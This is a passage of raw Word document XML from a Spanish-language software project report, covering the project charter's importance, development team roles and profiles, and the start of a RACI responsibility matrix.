        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Determina aspectos fundamentales, tales como el objetivo general del proyecto, alcance del mismo, responsables de proyecto y funciones, equipos de trabajo, plazos de tiempo previstos y presupuesto acordado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Transmite formalidad y buena imagen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Facilita entender la figura del jefe de proyecto y la importancia de las tareas de coordinación e interlocución que éste asume.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00000A"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="299E8D1D" wp14:editId="22816154">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>272415</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5013325" cy="6334125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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96">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="23305"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5013325" cy="6334125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Importancia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
        <w:t>Generar un acta de constitución de proyecto es de suma importancia ya que en ella se define lo que se va hacer, que se espera y que se pretende satisfacer con el desarrollo del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7D3B" w:rsidRPr="006B7D3B" w:rsidRDefault="006B7D3B" w:rsidP="006B7D3B">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7D3B">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Así como también se deja claro ciertos puntos del proyecto los cuales deben ser específicos como lo es el costo del proyecto, las personas que están involucradas en el mismo, es un documento donde tanto empresa desarrolladora como empresa cliente se comprometen a cumplir con las especificaciones que se plasmen en la misma.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95CD1" w:rsidRPr="00977053" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc514520853"/>
      <w:r w:rsidRPr="00977053">
        <w:t>Perfiles de los participantes y del administrador</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317B5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
        <w:t>El desarrollo de software es una actividad que, dada su complejidad, debe desarrollarse en grupo. Además, esta actividad requiere de distintas capacidades, las que no se encuentran todas en una sola persona. Por ello, se hace necesario formar el grupo de desarrollo con las personas que cubran todas las capacidades requeridas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317B5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
        <w:t>Cada una de esas personas aportará al grupo parte del total de las capacidades necesarias para llevar a cabo con éxito el desarrollo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317B5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Por ello, es que cada persona debe tener un rol dentro del grupo, que viene dado por su experiencia y capacidades personales. Estos roles son administrador de proyecto, analista, diseñador, programador, téster, asegurador de calidad, documentador, ingeniero de manutención, ingeniero de validación y verificación, administrador de la configuración y por último, el cliente. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317B5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
        <w:t>Para cada uno de estos roles, se definen sus objetivos, actividades, interacción con otros roles, herramientas a utilizar, perfil de las personas en ese rol y un plan de trabajo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00000A"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00000A"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317B5C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770474DC" wp14:editId="0BCD1267">
            <wp:extent cx="5605145" cy="6887845"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="45" name="Imagen 45" descr="Resultado de imagen para ejemplo Perfiles de los participantes y del administr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Resultado de imagen para ejemplo Perfiles de los participantes y del administrado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605145" cy="6887845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317B5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Importancia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00317B5C" w:rsidRPr="00317B5C" w:rsidRDefault="00317B5C" w:rsidP="00317B5C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:highlight w:val="green"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317B5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
        <w:t>En un entorno de trabajo es de suma importancia tener una asignación de roles bien elaborada esto de acuerdo a las habilidades y experiencia de cada de los involucrados del equipo de desarrollo, esto para tener un mejor desempeño de cada uno así como también un buen desarrollo de cada una de las actividades que implican el desarrollo del proyecto, esto trae consigo grandes ventajas en el ambiente laboral ya que teniendo claros los roles, responsabilidades y actividades a desarrollar por cada uno de los individuos hace que cada quien se centre en sus objetivos  y por ende exista armonía entre el equipo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075192E" w:rsidRDefault="0075192E" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="0075192E" w:rsidRPr="00977053" w:rsidRDefault="0075192E" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc514520854"/>
      <w:r w:rsidRPr="00977053">
        <w:t>Matriz de responsabilidad</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00B638FE" w:rsidRPr="00B638FE" w:rsidRDefault="00B638FE" w:rsidP="00B638FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>La matriz de asignación de responsabilidades es un mapa estructural que ilustra en quién recaen tareas y responsabilidades en la organización de un proyecto. Cada miembro del proyecto tiene sus tareas y responsabilidades que es plasmada en la matriz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B638FE" w:rsidRPr="00B638FE" w:rsidRDefault="0028614E" w:rsidP="00B638FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>RACI es el acrónimo para las palabras:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B638FE" w:rsidRPr="00B638FE" w:rsidRDefault="0028614E" w:rsidP="0028614E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="1276"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(R) Responsible - Responsable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B638FE" w:rsidRPr="00B638FE" w:rsidRDefault="0028614E" w:rsidP="0028614E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="1276"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(A) Accountable - Rinde cuentas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B638FE" w:rsidRPr="00B638FE" w:rsidRDefault="0028614E" w:rsidP="0028614E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="1276"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(C) Consulted    - Consultado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B638FE" w:rsidRPr="00B638FE" w:rsidRDefault="0028614E" w:rsidP="0028614E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="1276"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(I)  Informed      - Informado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028614E" w:rsidRDefault="0028614E" w:rsidP="00B638FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0028614E" w:rsidRDefault="0028614E" w:rsidP="00B638FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Responsable:</w:t>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aquellos recursos que hacen el trabajo para lograr la tarea. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B638FE" w:rsidRPr="00B638FE" w:rsidRDefault="0028614E" w:rsidP="00B638FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Normalmente hay un solo rol con el tipo de participación de responsable, aunque otros pueden asumir el mismo al ser delegada dicha responsabilidad para ayudar en el trabajo requerido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028614E" w:rsidRDefault="0028614E" w:rsidP="00B638FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Accountable:</w:t>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> (la persona que rinde cuentas sobre la actividad, también definido como la autoridad final de aprobación). El responsable en última instancia por la realización correcta y completa de la entrega o la tarea, y aquel a quien el responsable debe rendirle cuentas. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B638FE" w:rsidRPr="00B638FE" w:rsidRDefault="0028614E" w:rsidP="00B638FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>En otras palabras, un “Accountable” debe firmar la aprobación del trabajo que es proporcionado por el responsable. Sólo debe haber un “Accountable” especificado para cada tarea o entrega.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B638FE" w:rsidRPr="00B638FE" w:rsidRDefault="0028614E" w:rsidP="00B638FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Consultado:</w:t>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aquellos que, no estando directamente implicados en el desarrollo de las actividades, se les solicita opiniones, y con quien exista una comunicación bidireccional.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B638FE" w:rsidRPr="00B638FE" w:rsidRDefault="0028614E" w:rsidP="00B638FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Informado</w:t>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B638FE" w:rsidRPr="00B638FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
